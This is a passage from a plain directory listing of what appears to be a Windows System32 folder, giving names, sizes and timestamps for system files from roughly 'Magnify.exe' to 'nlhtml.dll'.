09/15/2018 07:28:44 Magnify.exe +D 0 09/15/2018 09:09:27 MailContactsCalendarSync +F 645632 09/15/2018 07:28:56 main.cpl +F 76288 09/15/2018 07:28:53 MaintenanceUI.dll +F 83456 09/15/2018 07:28:45 makecab.exe +F 225280 09/15/2018 09:10:00 manage-bde.exe +F 874 09/15/2018 07:29:54 manage-bde.wsf +F 566272 03/07/2020 00:53:41 MapConfiguration.dll +F 271360 03/07/2020 00:53:42 MapControlCore.dll +F 2560 09/15/2018 07:28:34 MapControlStringsRes.dll +F 2842112 03/07/2020 00:53:41 MapGeocoder.dll +F 148480 03/07/2020 00:53:53 mapi32.dll +F 148480 03/07/2020 00:53:53 mapistub.dll +F 3399168 03/07/2020 00:53:42 MapRouter.dll +F 138240 09/15/2018 07:28:34 MapsBtSvc.dll +F 15360 09/15/2018 07:28:34 MapsBtSvcProxy.dll +F 98304 09/15/2018 07:28:34 MapsCSP.dll +F 1176064 03/07/2020 00:53:42 MapsStore.dll +F 30720 09/15/2018 07:28:34 MapsTelemetry.dll +F 54272 09/15/2018 07:28:34 mapstoasttask.dll +F 43520 09/15/2018 07:28:34 mapsupdatetask.dll +F 185352 09/15/2018 09:09:59 mavinject.exe +F 926208 03/07/2020 00:53:40 MbaeApi.dll +F 1133568 03/07/2020 00:53:40 MbaeApiPublic.dll +F 116224 09/15/2018 07:29:20 MbaeParserTask.exe +F 51200 09/15/2018 07:29:20 MbaeXmlParser.dll +F 804352 09/15/2018 07:29:19 mblctr.exe +F 465408 03/07/2020 00:53:43 MBMediaManager.dll +F 860160 03/07/2020 00:53:46 MBR2GPT.EXE +F 667648 09/15/2018 07:28:34 mbsmsapi.dll +F 86528 09/15/2018 07:28:36 mbussdapi.dll +F 94208 03/07/2020 00:53:43 mcbuilder.exe +F 178688 09/14/2018 18:01:00 MCCSEngineShared.dll +F 20992 09/14/2018 18:04:00 MCCSPal.dll +F 98816 09/15/2018 07:29:22 mciavi32.dll +F 48640 09/15/2018 07:28:20 mcicda.dll +F 43008 09/15/2018 07:29:21 mciqtz32.dll +F 30720 09/15/2018 07:28:20 mciseq.dll +F 34304 03/07/2020 00:53:31 mciwave.dll +F 1022976 03/07/2020 00:54:09 MCRecvSrc.dll +F 83984 09/15/2018 07:28:52 mcupdate_AuthenticAMD.dll +F 1580048 09/15/2018 07:28:52 mcupdate_GenuineIntel.dll +F 458240 09/15/2018 09:10:02 MDEServer.exe +F 111616 03/07/2020 00:53:32 MDMAgent.exe +F 148480 03/07/2020 
00:54:09 MDMAppInstaller.exe +F 184832 09/15/2018 07:28:22 MdmCommon.dll +F 818688 03/07/2020 00:53:57 MdmDiagnostics.dll +F 51712 03/07/2020 00:53:43 MdmDiagnosticsTool.exe +F 179712 09/15/2018 07:29:23 mdminst.dll +F 59904 09/15/2018 07:28:50 mdmlocalmanagement.dll +F 140288 03/07/2020 00:53:58 mdmmigrator.dll +F 74752 03/07/2020 00:53:58 mdmpostprocessevaluator.dll +F 246784 03/07/2020 00:53:43 mdmregistration.dll +F 87040 09/15/2018 07:29:24 MdRes.exe +F 92160 09/15/2018 07:29:24 MdSched.exe +F 132096 09/15/2018 07:28:58 MediaFoundation.DefaultPerceptionProvider.dll +F 1284 09/15/2018 07:28:22 MediaSystemToastIcon.contrast-white.png +F 854 09/15/2018 07:28:22 MediaSystemToastIcon.png +F 110036 09/15/2018 07:28:22 MediumRoom.bin +F 32768 09/15/2018 07:29:24 MemoryDiagnostic.dll +F 1096704 09/15/2018 07:28:36 MessagingDataModel2.dll +F 55296 09/15/2018 07:28:20 MessagingService.dll +F 506408 03/07/2020 00:53:28 mf.dll +F 60928 03/07/2020 00:53:55 mf3216.dll +F 139088 09/15/2018 09:10:03 mfAACEnc.dll +F 2273296 03/07/2020 00:54:26 mfasfsrcsnk.dll +F 148992 09/15/2018 09:10:02 mfaudiocnv.dll +F 1415680 03/07/2020 00:53:52 mfc42.dll +F 1446400 03/07/2020 00:53:52 mfc42u.dll +F 518720 09/15/2018 09:10:02 MFCaptureEngine.dll +F 5436904 03/07/2020 00:54:26 mfcore.dll +F 35840 09/15/2018 07:28:42 mfcsubs.dll +F 1102896 09/15/2018 09:09:56 mfds.dll +F 147456 09/15/2018 09:10:00 mfdvdec.dll +F 70656 09/15/2018 09:10:04 mferror.dll +F 51200 09/15/2018 09:09:58 mfh263enc.dll +F 560128 03/07/2020 00:54:27 mfh264enc.dll +F 282112 09/15/2018 07:29:22 mfksproxy.dll +F 4920832 03/07/2020 00:54:26 MFMediaEngine.dll +F 98816 09/15/2018 09:09:59 mfmjpegdec.dll +F 1257984 09/15/2018 09:10:02 mfmkvsrcsnk.dll +F 2751336 03/07/2020 00:54:26 mfmp4srcsnk.dll +F 1201128 03/07/2020 00:54:26 mfmpeg2srcsnk.dll +F 1156456 09/15/2018 09:10:00 mfnetcore.dll +F 1665400 09/15/2018 09:09:59 mfnetsrc.dll +F 1233592 09/15/2018 09:10:02 mfperfhelper.dll +F 2100056 03/07/2020 00:54:26 mfplat.dll +F 
543352 09/15/2018 09:09:59 MFPlay.dll +F 50616 09/15/2018 09:10:01 mfpmp.exe +F 263576 03/07/2020 00:54:26 mfps.dll +F 1282944 03/07/2020 00:54:26 mfreadwrite.dll +F 335888 09/15/2018 07:29:21 mfsensorgroup.dll +F 1876960 03/07/2020 00:54:26 mfsrcsnk.dll +F 1296360 03/07/2020 00:54:26 mfsvr.dll +F 473304 09/15/2018 09:09:58 mftranscode.dll +F 96760 09/15/2018 09:09:59 mfvdsp.dll +F 44544 09/15/2018 09:09:54 mfvfw.dll +F 463872 09/15/2018 09:10:05 MFWMAAEC.DLL +F 23040 09/15/2018 07:28:57 mgmtapi.dll +F 114688 09/15/2018 07:29:25 mgmtrefreshcredprov.dll +F 125440 09/15/2018 07:28:29 mi.dll +F 90624 09/15/2018 07:28:29 mibincodec.dll +D 0 03/07/2020 10:34:47 Microsoft +F 209408 09/15/2018 07:28:30 Microsoft-Windows-AppModelExecEvents.dll +F 12288 09/15/2018 07:29:24 microsoft-windows-battery-events.dll +F 6656 09/15/2018 07:29:24 microsoft-windows-hal-events.dll +F 167424 09/15/2018 07:28:26 Microsoft-Windows-Internal-Shell-NearShareExperience.dll +F 43008 09/15/2018 07:29:24 microsoft-windows-kernel-pnp-events.dll +F 270336 09/15/2018 07:29:24 microsoft-windows-kernel-power-events.dll +F 128000 03/07/2020 00:54:17 microsoft-windows-kernel-processor-power-events.dll +F 113664 09/15/2018 07:28:34 Microsoft-Windows-MapControls.dll +F 8192 09/15/2018 07:28:34 Microsoft-Windows-MosHost.dll +F 72192 09/15/2018 07:29:24 microsoft-windows-pdc.dll +F 10240 09/15/2018 07:28:22 microsoft-windows-power-cad-events.dll +F 4096 09/15/2018 07:29:24 microsoft-windows-processor-aggregator-events.dll +F 6656 09/15/2018 07:29:23 microsoft-windows-sleepstudy-events.dll +F 6144 09/15/2018 07:28:42 microsoft-windows-storage-tiering-events.dll +F 434688 09/15/2018 07:28:46 microsoft-windows-system-events.dll +F 2560 09/15/2018 07:28:34 Microsoft-WindowsPhone-SEManagementProvider.dll +F 268800 09/15/2018 07:28:38 Microsoft.Bluetooth.Proxy.dll +F 3630592 03/07/2020 00:53:43 Microsoft.Bluetooth.Service.dll +F 491520 03/07/2020 00:53:31 Microsoft.Bluetooth.UserService.dll +F 914432 03/07/2020 
00:54:08 Microsoft.Graphics.Display.DisplayEnhancementService.dll +F 17920 09/15/2018 07:29:56 Microsoft.Management.Infrastructure.Native.Unmanaged.dll +F 13824 09/15/2018 09:10:00 Microsoft.Uev.AgentDriverEvents.dll +F 2426680 03/07/2020 00:53:30 Microsoft.Uev.AppAgent.dll +F 54272 09/15/2018 09:10:03 Microsoft.Uev.CabUtil.dll +F 214016 09/15/2018 09:10:03 Microsoft.Uev.CmUtil.dll +F 70656 03/07/2020 00:53:30 Microsoft.Uev.Common.dll +F 18944 09/15/2018 09:10:03 Microsoft.Uev.Common.WinRT.dll +F 1184256 03/07/2020 00:53:30 Microsoft.Uev.CommonBridge.dll +F 281088 03/07/2020 00:53:30 Microsoft.Uev.ConfigWrapper.dll +F 422912 03/07/2020 00:53:30 Microsoft.Uev.CscUnpinTool.exe +F 47104 09/15/2018 09:10:03 Microsoft.Uev.EventLogMessages.dll +F 17920 09/15/2018 09:10:03 Microsoft.Uev.LocalSyncProvider.dll +F 287744 09/15/2018 09:10:03 Microsoft.Uev.ManagedEventLogging.dll +F 22016 09/15/2018 09:10:03 Microsoft.Uev.Management.dll +F 23552 09/15/2018 09:10:03 Microsoft.Uev.Management.WmiAccess.dll +F 2158592 03/07/2020 00:53:30 Microsoft.Uev.ModernAppAgent.dll +F 58880 03/07/2020 00:53:30 Microsoft.Uev.ModernAppCore.dll +F 20992 09/15/2018 09:10:03 Microsoft.Uev.ModernAppData.WinRT.dll +F 14336 09/15/2018 09:10:03 Microsoft.Uev.ModernSync.dll +F 8192 09/15/2018 09:10:03 Microsoft.Uev.MonitorSyncProvider.dll +F 45056 09/15/2018 09:09:56 Microsoft.Uev.Office2010CustomActions.dll +F 740864 03/07/2020 00:53:30 Microsoft.Uev.Office2013CustomActions.dll +F 762880 03/07/2020 00:53:30 Microsoft.Uev.PrinterCustomActions.dll +F 11264 09/15/2018 09:10:03 Microsoft.Uev.SmbSyncProvider.dll +F 19456 09/15/2018 09:10:03 Microsoft.Uev.SyncCommon.dll +F 7680 09/15/2018 09:10:03 Microsoft.Uev.SyncConditions.dll +F 83456 09/15/2018 09:10:03 Microsoft.Uev.SyncController.exe +F 271872 03/07/2020 00:53:36 MicrosoftAccountCloudAP.dll +F 413184 03/07/2020 00:53:36 MicrosoftAccountExtension.dll +F 227840 03/07/2020 00:53:36 MicrosoftAccountTokenProvider.dll +F 460288 03/07/2020 00:53:36 
MicrosoftAccountWAMExtension.dll +F 104960 09/15/2018 07:28:24 MicrosoftEdgeBCHost.exe +F 104960 09/15/2018 07:28:50 MicrosoftEdgeCP.exe +F 104960 09/15/2018 07:28:22 MicrosoftEdgeDevTools.exe +F 57344 09/15/2018 07:28:32 MicrosoftEdgeSH.exe +F 25600 09/15/2018 07:28:22 midimap.dll +F 142848 09/15/2018 07:28:58 migisol.dll +D 0 03/07/2020 00:55:54 migration +F 183808 09/15/2018 07:29:16 miguiresource.dll +D 0 03/07/2020 00:55:54 migwiz +F 39936 09/15/2018 07:28:57 mimefilt.dll +F 158208 09/15/2018 07:28:29 mimofcodec.dll +F 12288 09/15/2018 07:28:42 MinstoreEvents.dll +F 302592 09/15/2018 07:28:50 mintdh.dll +F 37376 09/15/2018 07:28:38 MiracastInputMgr.dll +F 1315328 03/07/2020 00:54:09 MiracastReceiver.dll +F 37888 09/15/2018 07:29:22 MirrorDrvCompat.dll +F 3656704 03/07/2020 00:54:08 mispace.dll +F 83968 09/15/2018 07:28:58 MitigationConfiguration.dll +F 245248 09/15/2018 07:28:29 miutils.dll +F 673088 09/15/2018 07:28:54 mlang.dat +F 248832 09/15/2018 07:28:54 mlang.dll +F 1860096 09/15/2018 07:29:20 mmc.exe +F 3103 09/15/2018 07:31:36 mmc.exe.config +F 341504 09/15/2018 07:29:20 mmcbase.dll +F 64000 09/15/2018 07:28:22 mmci.dll +F 15872 09/15/2018 07:28:22 mmcico.dll +F 2895872 09/15/2018 07:29:19 mmcndmgr.dll +F 128512 09/15/2018 07:29:20 mmcshext.dll +F 443368 03/07/2020 00:53:31 MMDevAPI.dll +F 2100224 09/15/2018 07:28:36 mmgaclient.dll +F 155648 09/15/2018 07:28:36 mmgaproxystub.dll +F 1544192 09/15/2018 07:28:36 mmgaserver.exe +F 9569280 09/15/2018 07:28:42 mmres.dll +F 1001472 03/07/2020 00:53:51 mmsys.cpl +F 21504 09/15/2018 07:28:34 mobilenetworking.dll +F 98816 09/15/2018 07:29:22 mobsync.exe +F 31232 09/15/2018 07:29:16 mode.com +F 184320 09/15/2018 07:29:23 modemui.dll +F 518656 03/07/2020 00:53:37 modernexecserver.dll +F 28672 09/15/2018 07:29:14 more.com +F 185344 09/15/2018 07:29:21 moricons.dll +F 91648 09/15/2018 07:28:34 moshost.dll +F 93184 09/15/2018 07:28:34 MosHostClient.dll +F 246584 03/07/2020 00:53:42 moshostcore.dll +F 86016 09/15/2018 
07:28:34 MosStorage.dll +F 18432 09/15/2018 07:29:14 mountvol.exe +F 1386 09/15/2018 07:28:22 MouseSystemToastIcon.contrast-white.png +F 1087 09/15/2018 07:28:22 MouseSystemToastIcon.png +F 103824 09/15/2018 09:10:03 MP3DMOD.DLL +F 238640 09/15/2018 09:09:57 MP43DECD.DLL +F 360008 09/15/2018 09:10:04 MP4SDECD.DLL +F 101888 09/15/2018 07:29:23 Mpeg2Data.ax +F 234496 09/15/2018 07:29:21 mpeval.dll +F 260096 09/15/2018 07:29:24 mpg2splt.ax +F 239664 09/15/2018 09:10:03 MPG4DECD.DLL +F 19456 03/07/2020 00:53:52 mpnotify.exe +F 98664 03/07/2020 00:53:28 mpr.dll +F 517120 09/15/2018 07:28:57 mprapi.dll +F 888832 03/07/2020 00:53:45 mprddm.dll +F 500736 09/15/2018 07:28:57 mprdim.dll +F 13824 09/15/2018 07:28:55 mprext.dll +F 115200 09/15/2018 07:28:57 mprmsg.dll +F 748816 03/29/2020 10:37:41 MpSigStub.exe +F 1052160 03/07/2020 00:53:40 MPSSVC.dll +F 490496 09/15/2018 07:29:20 mpunits.dll +F 16896 09/15/2018 07:29:14 MRINFO.EXE +F 1069176 09/15/2018 07:28:36 MrmCoreR.dll +F 392992 09/15/2018 07:28:36 MrmDeploy.dll +F 861696 09/15/2018 07:28:53 MrmIndexer.dll +F 31904 09/15/2018 07:28:34 mrt100.dll +F 33440 09/15/2018 07:28:34 mrt_map.dll +F 56320 09/15/2018 07:28:57 ms3dthumbnailprovider.dll +F 165888 09/15/2018 07:28:56 msaatext.dll +F 246272 09/15/2018 09:10:00 MSAC3ENC.DLL +F 107408 09/15/2018 07:28:20 msacm32.dll +F 29184 09/15/2018 07:28:22 msacm32.drv +F 34800 09/15/2018 07:28:20 msadp32.acm +F 3072 09/15/2018 07:28:26 msafd.dll +F 3233792 09/15/2018 07:28:30 MSAJApi.dll +F 57344 09/15/2018 09:09:59 MSAlacDecoder.dll +F 74240 09/15/2018 09:09:54 MSAlacEncoder.dll +F 133120 09/15/2018 09:09:58 MSAMRNBDecoder.dll +F 209408 09/15/2018 09:09:58 MSAMRNBEncoder.dll +F 28672 09/15/2018 09:09:58 MSAMRNBSink.dll +F 93696 09/15/2018 09:09:58 MSAMRNBSource.dll +F 54272 03/07/2020 00:53:37 MSAProfileNotificationHandler.dll +F 63552 09/15/2018 07:28:46 msasn1.dll +F 421688 03/07/2020 00:54:27 MSAudDecMFT.dll +F 155136 09/15/2018 07:28:46 msaudite.dll +F 23040 03/07/2020 00:53:43 
msauserext.dll +F 304640 09/15/2018 07:28:44 mscandui.dll +F 11776 09/15/2018 07:28:50 mscat32.dll +F 82944 09/15/2018 07:28:53 MSchedExe.exe +F 231424 09/15/2018 07:31:36 msclmd.dll +F 686080 03/07/2020 00:53:39 mscms.dll +F 184320 09/15/2018 07:29:20 msconfig.exe +F 378880 09/15/2018 07:29:33 mscoree.dll +F 19968 09/15/2018 07:29:33 mscorier.dll +F 73864 09/15/2018 07:29:33 mscories.dll +F 1484384 03/07/2020 00:53:51 msctf.dll +F 10752 09/15/2018 07:28:44 msctfime.ime +F 87040 03/07/2020 00:53:53 MsCtfMonitor.dll +F 218112 09/15/2018 07:28:44 msctfp.dll +F 120320 09/15/2018 07:28:44 msctfui.dll +F 1890816 03/07/2020 00:53:53 msctfuimanager.dll +F 160256 09/15/2018 07:29:19 msdadiag.dll +F 136192 09/15/2018 07:28:52 msdart.dll +F 5120 09/15/2018 07:29:19 msdatsrc.tlb +F 516408 09/15/2018 07:28:51 msdelta.dll +F 34088 09/15/2018 07:28:20 msdmo.dll +D 0 09/15/2018 07:34:01 MSDRM +F 560128 09/15/2018 07:28:26 msdrm.dll +F 1562624 09/15/2018 07:29:23 msdt.exe +D 0 09/15/2018 07:34:01 MsDtc +F 148480 09/15/2018 07:29:16 msdtc.exe +F 372224 09/15/2018 07:29:16 msdtckrm.dll +F 128000 09/15/2018 07:29:14 msdtclog.dll +F 864256 09/15/2018 07:29:14 msdtcprx.dll +F 15360 09/15/2018 07:29:14 msdtcspoffln.dll +F 1604096 09/15/2018 07:29:14 msdtctm.dll +F 322048 09/15/2018 07:29:14 msdtcuiu.dll +F 22528 09/15/2018 07:28:42 msdtcVSp1res.dll +F 77824 09/15/2018 07:29:23 MSDvbNP.ax +F 7168 09/15/2018 09:08:37 msdxm.ocx +F 44032 09/15/2018 09:08:37 msdxm.tlb +F 791040 03/07/2020 00:54:15 msfeeds.dll +F 96256 03/07/2020 00:54:15 msfeedsbs.dll +F 15360 09/15/2018 07:29:18 msfeedssync.exe +F 427520 03/07/2020 00:54:27 MSFlacDecoder.dll +F 273920 03/07/2020 00:54:24 MSFlacEncoder.dll +F 3329536 03/07/2020 00:53:37 msftedit.dll +F 56832 09/15/2018 07:28:58 MsftOemDllIgneous.dll +F 26112 09/15/2018 09:10:03 msg.exe +F 25824 09/15/2018 07:28:20 msg711.acm +F 42904 09/15/2018 07:28:20 msgsm32.acm +F 36864 09/15/2018 09:09:56 MSHEIF.dll +F 14848 09/15/2018 07:29:18 mshta.exe +F 23463424 
03/07/2020 00:54:14 mshtml.dll +F 2755584 09/15/2018 07:29:18 mshtml.tlb +F 83968 09/15/2018 07:29:18 MshtmlDac.dll +F 97792 09/15/2018 07:29:16 mshtmled.dll +F 49152 09/15/2018 07:29:17 mshtmler.dll +F 4664320 03/07/2020 00:54:15 msi.dll +F 44032 09/15/2018 07:29:23 MsiCofire.dll +F 15360 09/15/2018 07:28:53 msidcrl40.dll +F 63488 09/15/2018 07:28:53 msident.dll +F 11776 09/15/2018 07:28:53 msidle.dll +F 5120 09/15/2018 07:28:53 msidntld.dll +F 322048 09/15/2018 07:28:25 msieftp.dll +F 67072 03/07/2020 00:54:15 msiexec.exe +F 407552 09/15/2018 07:29:20 msihnd.dll +F 21504 09/15/2018 07:29:20 msiltcfg.dll +F 8192 09/15/2018 07:28:46 msimg32.dll +F 26112 09/15/2018 07:29:18 msimsg.dll +F 50688 09/15/2018 07:28:44 msimtf.dll +F 367104 09/15/2018 07:29:24 msinfo32.exe +F 30208 03/07/2020 00:54:15 msisip.dll +F 309760 03/07/2020 00:53:57 msIso.dll +F 12288 09/15/2018 07:29:19 msiwer.dll +F 187392 09/15/2018 07:28:30 mskeyprotcli.dll +F 62976 09/15/2018 07:28:30 mskeyprotect.dll +F 214016 09/15/2018 07:28:57 msls31.dll +F 1057976 03/07/2020 00:54:27 msmpeg2adec.dll +F 933376 09/15/2018 09:10:03 MSMPEG2ENC.DLL +F 2469432 03/07/2020 00:54:27 msmpeg2vdec.dll +F 257024 09/15/2018 07:29:23 MSNP.ax +F 63488 09/15/2018 07:28:46 msobjs.dll +F 114176 09/15/2018 07:29:20 msoert2.dll +F 159744 09/15/2018 09:09:58 MSOpusDecoder.dll +F 6784512 09/15/2018 07:28:53 mspaint.exe +F 55096 09/15/2018 07:28:51 mspatcha.dll +F 82944 09/15/2018 07:28:51 mspatchc.dll +F 1634304 09/15/2018 09:09:59 MSPhotography.dll +F 54784 09/15/2018 07:29:22 msports.dll +F 2560 09/15/2018 07:28:46 msprivs.dll +F 587776 09/15/2018 07:29:47 msra.exe +F 136192 09/15/2018 07:29:47 msrahc.dll +F 7680 09/15/2018 07:29:47 MsraLegacy.tlb +F 12288 09/15/2018 07:28:50 msrating.dll +F 181760 09/15/2018 07:29:21 msrdc.dll +F 62464 09/15/2018 07:29:23 MsRdpWebAccess.dll +F 17920 09/15/2018 07:29:22 msrle32.dll +F 72704 03/07/2020 00:53:39 msscntrs.dll +F 101888 03/07/2020 00:54:25 mssecuser.dll +F 74752 09/15/2018 
07:28:50 mssign32.dll +F 10240 09/15/2018 07:28:51 mssip32.dll +F 128512 09/15/2018 07:28:34 mssitlb.dll +F 909824 03/07/2020 00:53:46 MsSpellCheckingFacility.dll +F 81920 09/15/2018 07:29:46 MsSpellCheckingHost.exe +F 198656 03/07/2020 00:53:39 mssph.dll +F 146432 03/07/2020 00:53:39 mssprxy.dll +F 2848768 03/07/2020 00:53:39 mssrch.dll +F 817664 03/07/2020 00:53:39 mssvp.dll +F 249856 09/15/2018 07:28:45 mstask.dll +F 585728 09/15/2018 07:29:22 msTextPrediction.dll +F 3690496 03/07/2020 00:54:17 mstsc.exe +F 8907776 03/07/2020 00:54:17 mstscax.dll +F 501760 03/07/2020 00:53:53 msutb.dll +F 461840 03/07/2020 00:53:26 msv1_0.dll +F 83968 09/15/2018 07:28:45 msvcirt.dll +F 560576 09/15/2018 07:28:22 msvcp110_win.dll +F 690008 09/15/2018 07:29:51 msvcp120_clr0400.dll +F 627368 02/16/2017 16:45:12 msvcp140.dll +F 612864 09/15/2018 07:28:45 msvcp60.dll +F 646632 03/07/2020 00:53:26 msvcp_win.dll +F 19080 09/15/2018 07:29:50 msvcr100_clr0400.dll +F 993632 09/15/2018 07:29:48 msvcr120_clr0400.dll +F 638376 03/07/2020 00:53:54 msvcrt.dll +F 143872 09/15/2018 07:29:22 msvfw32.dll +F 39424 09/15/2018 07:29:22 msvidc32.dll +F 3406848 03/07/2020 00:54:16 MSVidCtl.dll +F 719968 09/15/2018 09:09:54 MSVideoDSP.dll +F 43888 09/15/2018 09:09:59 MSVP9DEC.dll +F 1459080 03/07/2020 00:54:26 msvproc.dll +F 43888 09/15/2018 09:09:57 MSVPXENC.dll +F 255312 09/15/2018 07:28:29 MSWB7.dll +F 35328 09/15/2018 09:10:00 MSWebp.dll +F 424448 09/15/2018 09:10:04 mswmdm.dll +F 408800 03/07/2020 00:53:26 mswsock.dll +F 1886208 03/07/2020 00:53:43 msxml3.dll +F 2560 09/15/2018 07:28:53 msxml3r.dll +F 2437344 03/07/2020 00:53:40 msxml6.dll +F 2560 09/15/2018 07:28:36 msxml6r.dll +F 27648 09/15/2018 07:29:21 msyuv.dll +F 218112 09/15/2018 07:28:41 MtcModel.dll +F 276496 03/07/2020 00:53:28 MTF.dll +F 102400 03/07/2020 00:53:31 MTFAppServiceDS.dll +F 321536 03/07/2020 00:53:31 MtfDecoder.dll +F 158720 03/07/2020 00:53:31 MTFFuzzyDS.dll +F 259072 09/15/2018 07:28:53 MTFServer.dll +F 109056 03/07/2020 
00:53:31 MTFSpellcheckDS.dll +F 135168 09/15/2018 07:28:42 mtstocom.exe +F 424960 09/15/2018 07:29:16 mtxclu.dll +F 32768 09/15/2018 07:28:42 mtxdm.dll +F 9728 09/15/2018 07:28:42 mtxex.dll +F 145408 09/15/2018 07:29:16 mtxoci.dll +D 0 09/15/2018 09:07:52 MUI +F 18432 09/15/2018 07:28:50 muifontsetup.dll +F 16384 09/15/2018 07:28:53 MUILanguageCleanup.dll +F 103424 03/07/2020 00:53:55 MuiUnattend.exe +F 53760 09/15/2018 07:29:22 MultiDigiMon.exe +F 145408 03/07/2020 00:53:29 musdialoghandlers.dll +F 591872 03/07/2020 00:53:29 MusNotification.exe +F 442880 03/07/2020 00:53:29 MusNotificationUx.exe +F 376784 03/07/2020 00:53:29 MusNotifyIcon.exe +F 985088 03/07/2020 00:53:29 MusUpdateHandlers.dll +D 0 09/15/2018 07:34:01 my-mm +F 264192 09/15/2018 07:29:16 mycomput.dll +F 161280 09/15/2018 07:28:44 mydocs.dll +F 152576 09/15/2018 07:29:22 Mystify.scr +F 50688 03/07/2020 00:54:15 NAPCRYPT.DLL +F 68096 09/15/2018 07:28:29 NapiNSP.dll +F 399360 03/07/2020 00:53:51 Narrator.exe +F 833024 09/15/2018 07:28:26 NaturalAuth.dll +F 22016 09/15/2018 07:28:26 NaturalAuthClient.dll +F 1059840 09/15/2018 07:28:29 NaturalLanguage6.dll +F 39936 09/15/2018 07:28:32 navshutdown.dll +D 0 09/15/2018 09:09:27 nb-NO +F 21504 09/15/2018 07:28:56 nbtstat.exe +F 25600 09/15/2018 07:28:51 NcaApi.dll +F 175616 03/07/2020 00:53:57 NcaSvc.dll +F 374784 09/15/2018 07:28:34 ncbservice.dll +F 89600 09/15/2018 07:29:24 NcdAutoSetup.dll +F 25600 09/15/2018 07:29:20 NcdProp.dll +F 46080 09/15/2018 07:28:50 nci.dll +F 69632 09/15/2018 07:28:25 ncobjapi.dll +F 102912 09/15/2018 07:28:55 ncpa.cpl +F 145144 09/15/2018 07:28:45 ncrypt.dll +F 346624 03/07/2020 00:53:26 ncryptprov.dll +F 131688 09/15/2018 07:28:46 ncryptsslp.dll +F 516096 03/07/2020 00:53:44 ncsi.dll +F 27136 09/15/2018 07:28:56 ncuprov.dll +F 69120 09/15/2018 07:28:56 ndadmin.exe +F 12288 09/15/2018 07:29:19 nddeapi.dll +D 0 09/15/2018 07:33:50 NDF +F 303616 09/15/2018 07:29:22 ndfapi.dll +F 44032 09/15/2018 07:29:22 ndfetw.dll +F 565 
09/15/2018 07:29:22 NdfEventView.xml +F 112640 09/15/2018 07:29:22 ndfhcdiscovery.dll +F 97280 09/15/2018 07:29:24 ndishc.dll +F 32768 09/15/2018 07:29:22 ndproxystub.dll +F 72704 09/15/2018 07:29:13 nduprov.dll +F 115200 03/07/2020 00:53:37 negoexts.dll +F 57344 09/15/2018 07:29:16 net.exe +F 176640 09/15/2018 07:29:14 net1.exe +F 80600 09/15/2018 07:28:29 netapi32.dll +F 18432 09/15/2018 07:28:56 netbios.dll +F 26112 09/15/2018 07:28:55 netbtugc.exe +F 69632 09/15/2018 07:29:25 NetCellcoreCellManagerProviderResources.dll +F 1216512 09/15/2018 07:29:19 netcenter.dll +F 36352 09/15/2018 07:28:51 netcfg.exe +F 78336 09/15/2018 07:28:56 NetCfgNotifyObjectHost.exe +F 101688 09/15/2018 07:28:56 netcfgx.dll +F 460800 09/15/2018 07:29:24 netcorehc.dll +F 316928 09/15/2018 07:29:22 netdiagfx.dll +F 111616 09/15/2018 06:09:27 NetDriverInstall.dll +F 20480 09/15/2018 07:28:53 netevent.dll +F 46080 09/15/2018 07:29:22 NetEvtFwdr.exe +F 106496 09/15/2018 07:29:33 netfxperf.dll +F 2560 09/15/2018 07:29:16 neth.dll +F 10752 09/15/2018 07:28:57 NetHost.exe +F 174592 09/15/2018 07:28:55 netid.dll +F 198144 03/07/2020 00:53:26 netiohlp.dll +F 30208 09/15/2018 07:28:56 netiougc.exe +F 162816 09/15/2018 07:28:56 netjoin.dll +F 869888 03/07/2020 00:53:28 netlogon.dll +F 262656 03/07/2020 00:53:34 netman.dll +F 2560 09/15/2018 07:28:45 netmsg.dll +F 308224 03/07/2020 00:53:53 netplwiz.dll +F 40448 09/15/2018 07:28:44 Netplwiz.exe +F 224256 09/15/2018 07:28:56 netprofm.dll +F 581632 03/07/2020 00:53:45 netprofmsvc.dll +F 64512 09/15/2018 07:28:55 netprovfw.dll +F 70144 09/15/2018 07:28:56 netprovisionsp.dll +F 143880 03/07/2020 00:53:53 NetSetupApi.dll +F 821048 03/07/2020 00:53:53 NetSetupEngine.dll +F 505344 03/07/2020 00:53:44 NetSetupShim.dll +F 332800 03/07/2020 00:53:55 NetSetupSvc.dll +F 93184 09/15/2018 07:29:14 netsh.exe +F 2875904 09/15/2018 07:28:55 netshell.dll +F 289280 03/30/2020 08:52:15 netsrv.exe +F 38400 09/15/2018 07:29:14 NETSTAT.EXE +F 1132032 03/07/2020 00:54:16 
nettrace.dll +F 21656 09/15/2018 07:29:23 NetTrace.PLA.Diagnostics.xml +F 44440 09/15/2018 07:28:46 netutils.dll +F 340992 09/15/2018 07:28:56 NetworkBindingEngineMigPlugin.dll +F 695808 09/15/2018 07:29:18 NetworkCollectionAgent.dll +F 236032 09/15/2018 07:28:56 NetworkDesktopSettings.dll +F 1195520 09/15/2018 07:28:50 networkexplorer.dll +F 139776 09/14/2018 18:02:00 networkhelper.dll +F 54784 09/15/2018 07:28:50 networkitemfactory.dll +D 0 09/15/2018 07:33:50 networklist +F 3344896 03/07/2020 00:53:48 NetworkMobileSettings.dll +F 54784 09/15/2018 07:28:50 NetworkProxyCsp.dll +F 127488 09/15/2018 07:28:56 NetworkStatus.dll +F 356864 09/15/2018 07:28:38 NetworkUXBroker.dll +F 12800 09/15/2018 07:28:25 netwphelper.dll +F 523776 03/07/2020 00:53:44 newdev.dll +F 71680 09/15/2018 07:28:56 newdev.exe +F 99840 03/07/2020 00:53:33 NFCProvisioningPlugin.dll +F 52224 09/15/2018 07:28:32 NfcRadioMedia.dll +F 558592 03/07/2020 00:53:42 ngccredprov.dll +F 497152 03/07/2020 00:53:42 NgcCtnr.dll +F 486400 09/15/2018 07:28:46 NgcCtnrGidsHandler.dll +F 621568 03/07/2020 00:53:42 NgcCtnrSvc.dll +F 461488 03/07/2020 00:54:08 NgcIso.exe +F 616960 03/07/2020 00:54:08 NgcIsoCtnr.dll +F 192512 09/15/2018 07:28:36 ngckeyenum.dll +F 124416 09/15/2018 07:28:34 ngcksp.dll +F 76288 09/15/2018 07:28:50 ngclocal.dll +F 190976 03/07/2020 00:53:42 ngcpopkeysrv.dll +F 145920 09/15/2018 07:28:34 NgcProCsp.dll +F 188928 09/15/2018 07:28:36 ngcrecovery.dll +F 782848 03/07/2020 00:53:42 ngcsvc.dll +F 177664 03/07/2020 00:53:46 ngctasks.dll +F 392192 03/07/2020 00:53:52 ninput.dll +D 0 09/15/2018 09:09:27 nl-NL +F 92160 03/07/2020 00:53:44 nlaapi.dll +F 93696 03/07/2020 00:54:17 nlahc.dll +F 385536 03/07/2020 00:53:44 nlasvc.dll +F 191488 09/15/2018 07:28:57 nlhtml.dll +F 175616 